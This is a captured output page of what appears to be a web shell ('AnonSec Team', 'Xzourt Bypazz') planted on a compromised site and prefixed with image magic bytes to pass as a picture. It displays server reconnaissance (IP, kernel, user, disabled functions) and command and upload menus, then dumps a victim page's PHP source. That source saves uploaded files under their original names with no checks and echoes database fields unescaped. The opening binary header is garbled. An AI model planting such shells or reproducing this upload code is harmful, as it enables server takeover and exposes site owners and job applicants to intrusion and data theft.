����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������ Xzourt Bypazz

Upload your file


�����x������x������C�     ���C   ����<�d"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ��?��S��(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(��ÿØÿà JFIF ÿþ;GIF89;aGIF89;aGIF89;a AnonSec Team
AnonSec Team
Server IP : 103.191.208.227  /  Your IP : 18.224.38.170
Web Server : LiteSpeed
System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
User : mhmsfzcs ( 1485)
PHP Version : 8.1.31
Disable Function : show_source, system, shell_exec, passthru, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/mhmsfzcs/vflyorions.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mhmsfzcs/vflyorions.com/career.php
<link rel="canonical" href="https://vflyorions.com/career"/>
<meta charset="UTF-8">
     <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <meta name="description" content="Explore exciting career opportunities at Vflyorions, where innovation meets excellence.
Join a dynamic team & shape your future." />
    
    <meta name="keywords" content="BPO Service in nagpur, BPO voice and non voice, BPO voice In nagpur, BPO non voice in nagpur , BPO voice company in nagpur, BPO non-voice company in nagpur, BPO voice and non voice services, BPO outsorcing, B2B call Center" />
    <!-- ======== Page title ============ -->
    <title>Vflyorions Careers - Explore Exciting Career Opportunities </title>
    
    <?php
$page = 'career';
include 'header.php';
include 'db.php';


if (isset($_POST['apply']))
{
  $name=$_POST['name'];
  $phone=$_POST['phone'];
  $email=$_POST['email'];
  $education=$_POST['education'];
  $resume=$_FILES['resume']['name']; 
 
   $upload='resume/'.$resume;
   
    $insert = $conn->prepare("INSERT INTO `apply`(`name`,`phone`,`email`,`education`,`resume`) VALUES (?,?,?,?,?)");
      
    $insert->bind_param("sssss",$name,$phone,$email,$education,$resume);
     
       $res=$insert->execute();
       
        $destinationfile='resume/'.$resume;
        move_uploaded_file($_FILES['resume']['tmp_name'], $destinationfile);
    
       if($res)
       {
              $_SESSION['status']="Applied Successfully";
               $_SESSION['status_code']="success";
       }
       else
       {
               $_SESSION['status']="Oops something went wrong!!";
               $_SESSION['status_code']="error";
       }    
}

?>
    
 <style>
     .div60{
         padding:30px;
     }

.form-group{
    padding:5px;
    border-radius:10px;
}
details {
  width: 90%;
  min-height: 5px;
  max-width: 1180px;
  padding: 15px;
  margin: 0 auto;
  position: relative;
  font-size: 22px;
  /*border: 1px solid rgba(0,0,0,.1);*/
  /*border-radius: 15px;*/
  box-shadow: 0px 1px 5px 5px #f7f5f5;
  box-sizing: border-box;
  transition: all .3s;
}

details + details {
  margin-top: 20px;
}

details[open] {
  min-height: 50px;
  background-color: #ffffff;
  /*box-shadow: 2px 2px 20px rgba(0,0,0,.2);*/
  border-left: 5px solid #FF5E14;
}


details p {
   
  color: #2a2d32;
  font-weight: 300;
}
    
summary {
  
  font-size:25px;
  display: flex;
  justify-content: space-between;
  align-items: center;
  font-weight: 500;
  cursor: pointer;
}

summary:focus {
  outline: none;
}

summary:focus::after {
  content: "";
  height: 100%;
  width: 100%;
  display: block;
  position: absolute;
  top: 0;
  left: 0;
  /*box-shadow: 0 0 0 5px rebeccapurple;*/
}

summary::-webkit-details-marker {
  display: none
}

.control-icon {
  fill: rebeccapurple;
  transition: .3s ease;
  pointer-events: none;
}

.control-icon-close {
  display: none;
}

details[open] .control-icon-close {
  display: initial;
  transition: .3s ease;
}

details[open] .control-icon-expand {
  display: none;
}

/*Job description*/

.head2{
    text-align:center;
    margin-top:10px;
    font-size:40px;
}

.head5{
    font-size:20px;
    font-weight:500;
}

.li{
    font-size:18px;
}

.modal-content{
margin-top: 10%;
}

.header5{
    font-size:22px !important;
    font-weight:600 !important;
    text-transform: capitalize;
    color:#FF5E14 !important;
}

.header6{
    font-size:36px;
    font-weight:700;
    text-transform:capitalize;
    font-family:"Roboto", Sans-serif !important;
    line-height:145%;
}
.header3{
    font-family: "Roboto", sans-serif;
    font-size:22px !important;
    font-weight:600 !important;
    text-transform: capitalize;
    color:#c1511e !important;
}

.header-5{
    font-family: "Roboto", sans-serif;
    font-size:18px !important;
    font-weight:600 !important;
    text-transform: capitalize;
    color:#864f36 !important;
}

.modal-body{
    padding:15px;
}

.form-control{
    padding: 14px 30px !important;
    border-color:#fafafa !important ;
    font-size:16px;
    font-weight:500;
}
 </style>


    <div class="page-banner-wrap bg-cover" style="background-image: url('assets/img/allbanner.png')">
        <div class="container">
            <div class="row">
                <div class="col-12 col-lg-12">
                    <div class="page-heading text-white">
                        <h1>Career</h1>
                    </div>
                    <div class="breadcrumb-wrap">
                        
                        <nav>
                            <ol class="breadcrumb">
                              <li class="breadcrumb-item"><a href="index.php">Home</a></li>
                              <li class="breadcrumb-item active" aria-current="page">Career</li>
                            </ol>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </div>
    
   <div class="div60"></div>
   
        <div
            style="visibility: hidden; position: absolute; width: 0px; height: 0px;">
            <svg xmlns="http://www.w3.org/2000/svg">
                <symbol viewBox="0 0 24 24" id="expand-more">
                    <path d="M16.59 8.59L12 13.17 7.41 8.59 6 10l6 6 6-6z" />
                    <path d="M0 0h24v24H0z" fill="none" />
                </symbol>
                <symbol viewBox="0 0 24 24" id="close">
                    <path
                        d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z" />
                    <path d="M0 0h24v24H0z" fill="none" />
                </symbol>
            </svg>
        </div>
 <?php 
            $ins="SELECT * FROM career";
            $res=$conn->query($ins);
            while($row=$res->fetch_assoc())
            {
            ?>
        <details>
           
            <summary>
                <center>
                    <div class="section-title">
                    <h5 class="header5" style="text-align:left;"><?php echo $row['heading'];?></h5>
                    </div>
                </center>
                
                <svg class="control-icon control-icon-expand" width="24"
                    height="24" role="presentation">
                    <use xmlns:xlink="http://www.w3.org/1999/xlink"
                        xlink:href="#expand-more" />
                </svg>
                <svg class="control-icon control-icon-close" width="24"
                    height="24" role="presentation">
                    <use xmlns:xlink="http://www.w3.org/1999/xlink"
                        xlink:href="#close" />
                </svg>
            </summary>
        
            <div class="container custom-container">
                
                <!--Job Description-->
                <div class="row">
                <h3 class="header3">Job Description</h3>
                
                <!-- First Column -->    
                    <div class="col-md-3">
                        <h5 class="header-5">Roles & Responsibility:</h5>
                    </div>
                        
                        
                <!-- Second Column -->
                    <div class="col-md-9">
                       <p style=" margin: 0 0 23px 0;font-size: 18px;font-family: 'Font Awesome 5 Pro';"> <?php echo $row['role'];?></p>
                        <!--<ul>-->
                        <!--    <li class="li">Performing market research</li>-->
                        <!--    <li class="li">Assisting and coordinating with the sales team.</li>-->
                        <!--    <li class="li">Assisting the Front Office team.</li>-->
                        <!--    <li class="li">Assisting and supporting management.</li>-->
                        <!--    <li class="li">Should have good computer and Basic Excel knowledge</li>-->
                        <!--    <li class="li">Job Type: Full-time ( Work From Home)</li>-->
                        <!--</ul>-->
                        
                    </div>
                </div>    
                
                <!--Salary-->
                <div class="row">
                <!-- First Column -->    
                    <div class="col-md-3">
                        <h5 class="header-5" >Salary:</h5>
                    </div>
                        
                        
                <!-- Second Column -->
                    <div class="col-md-9">
                        <p class="li" style="margin: 0 0 23px 0; font-family: 'Font Awesome 5 Pro';
    font-size: 18px;"><?php echo $row['salary'];?></p>
                    </div>
                </div>    
                
                <!--Schedule-->
                <div class="row">
                <!-- First Column -->    
                    <div class="col-md-3">
                        <h5 class="header-5">Schedule:</h5>
                    </div>
                        
                        
                <!-- Second Column -->
                    <div class="col-md-9">
                       <p style=" margin: 0 0 23px 0;font-size: 18px;font-family: 'Font Awesome 5 Pro';"> <?php echo $row['schedule'];?></p>
                        <!--<ul>-->
                        <!--    <li class="li">Day Shift</li>-->
                        <!--    <li class="li">Evening Shift</li>-->
                        <!--    <li class="li">Morning Shift</li>-->
                        <!--</ul>-->
                       
                    </div>
                </div>    
                
                <!--Education-->
                <div class="row">
                <!-- First Column -->    
                    <div class="col-md-3">
                        <h5 class="header-5">Education:</h5>
                    </div>
                        
                        
                <!-- Second Column -->
                    <div class="col-md-9">
                        <p class="li" style="margin: 0 0 23px 0; font-family: 'Font Awesome 5 Pro';
    font-size: 18px;"><?php echo $row['education'];?></p>
                       
                    </div>
                </div>    
                
                <!--Experience-->
                <div class="row">
                <!-- First Column -->    
                    <div class="col-md-3">
                        <h5 class="header-5">Experience:</h5>
                    </div>
                        
                        
                <!-- Second Column -->
                    <div class="col-md-9">
                     <p style="margin: 0 0 23px 0; font-family: 'Font Awesome 5 Pro';
    font-size: 18px;">   <?php echo $row['experience']; ?></p>
                        <!--<ul>-->
                        <!--    <li class="li">Data entry: 0- 1 year (Preferred) </li>-->
                        <!--    <li class="li">Total work: 0- 1 year (Preferred) </li>-->
                        <!--</ul>-->
                       
                    </div>
                </div> 
                
                <!--Language-->
                <div class="row">
                <!-- First Column -->    
                    <div class="col-md-3">
                        <h5 class="header-5">Language:</h5>
                    </div>
                        
                        
                <!-- Second Column -->
                    <div class="col-md-9">
                       <p style=" margin: 0 0 23px 0;font-size: 18px;font-family: 'Font Awesome 5 Pro';"><?php echo $row['language'];?></p>
                        <!--<ul>-->
                        <!--    <li class="li">English (Preferred)</li>-->
                        <!--    <li class="li">Hindi (Preferred)</li>-->
                        <!--    <li class="li">Marathi (Preferred)</li>-->
                        <!--    <li class="li">Job Type: Part-time</li>-->
                        <!--</ul>-->
                       
                    </div>
                </div> 
                
                <!--Part-time hours-->
                <div class="row">
                <!-- First Column -->    
                    <div class="col-md-3">
                        <h5 class="header-5">Working hours:</h5>
                    </div>
                        
                        
                <!-- Second Column -->
                    <div class="col-md-9">
                        <p class="li" style=" margin: 0 0 23px 0;font-size: 20px;font-family: 'Font Awesome 5 Pro';"><?php echo $row['hour'];?> </p>
                       <button type="button" class="theme-btn " data-toggle="modal"data-target="#exampleModal<?php echo $row['id'];?>" style=" margin-top:20px;">Apply Now</button>
                       <!-- Modal -->
                       <div class="modal fade" id="exampleModal<?php echo $row['id'];?>" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
                           <div class="modal-dialog" role="document" style=" max-width: 820px !important;">
                               <div class="modal-content" >
                                    <div class="modal-header" style="border-bottom: 0 !important">
                                        <center>
                                             <h5 class="header6" id="exampleModalLabel" >Apply Form</h5>
                                      
                                        </center>
                                        <button type="button" class="close" data-dismiss="modal" aria-label="Close" >
                                           <span aria-hidden="true">&times;</span>
                                        </button>
                                    </div>
                                    
                                    <div class="container" style="padding:40px;">
                                        <div class="row">
                                            
                                            <form method="POST" enctype="multipart/form-data">
                                                <div class="row">
                                                    <div class="form-group col-md-6">
                                                        <input type="text" class="form-control" id="name" name="name" placeholder="Name" required>
                                                    </div>
                                                    
                                                    <div class="form-group col-md-6">
                                                        <input type="text" class="form-control" id="phone" name="phone" placeholder="Phone No">
                                                    </div>
                                                    
                                                    <div class="form-group col-md-6">
                                                        <input type="text" class="form-control" id="email" name="email" placeholder="E-mail">
                                                    </div>
                                                    
                                                    <div class="form-group col-md-6">
                                                        <input type="text" class="form-control" id="edu" name="education" placeholder="Education">
                                                    </div>
                                                    
                                                    <div class="form-group col-md-12">
                                                        <input type="file" class="form-control" id="fileInput" name="resume" required>
                                                    </div>
                                                    
                                                    <center>
                                                        <button type="submit" name="apply" class="theme-btn">Apply</button>
                                                    </center>
                                            </form>
                                        </div>
                            
                            
                            </div>
                </div>
            </div>
            </div>
                    </div>
                </div>    
            </div>
        
        </details>
       <?php
            }
            ?>
       
       
       
      
        
        
    
        <div class="div60"></div>
        
        
        
        
        <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
        <!--<script-->
        <!--    src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>-->
        <script
            src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
            
            
            
             <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
<?php  if(isset($_SESSION['status']) && $_SESSION['status']!='') { ?>
<script>
   new swal({
   title: "<?php echo $_SESSION['status'];?>",
   //text: "You clicked the button!",
   icon: "<?php echo $_SESSION['status_code'];?>",
   button: "OK",
   }).then(function() {
   window.location = "";
   });
</script>
<?php
   unset($_SESSION['status']);
   }
   ?>

 <?php
include 'footer.php';

?>

AnonSec - 2021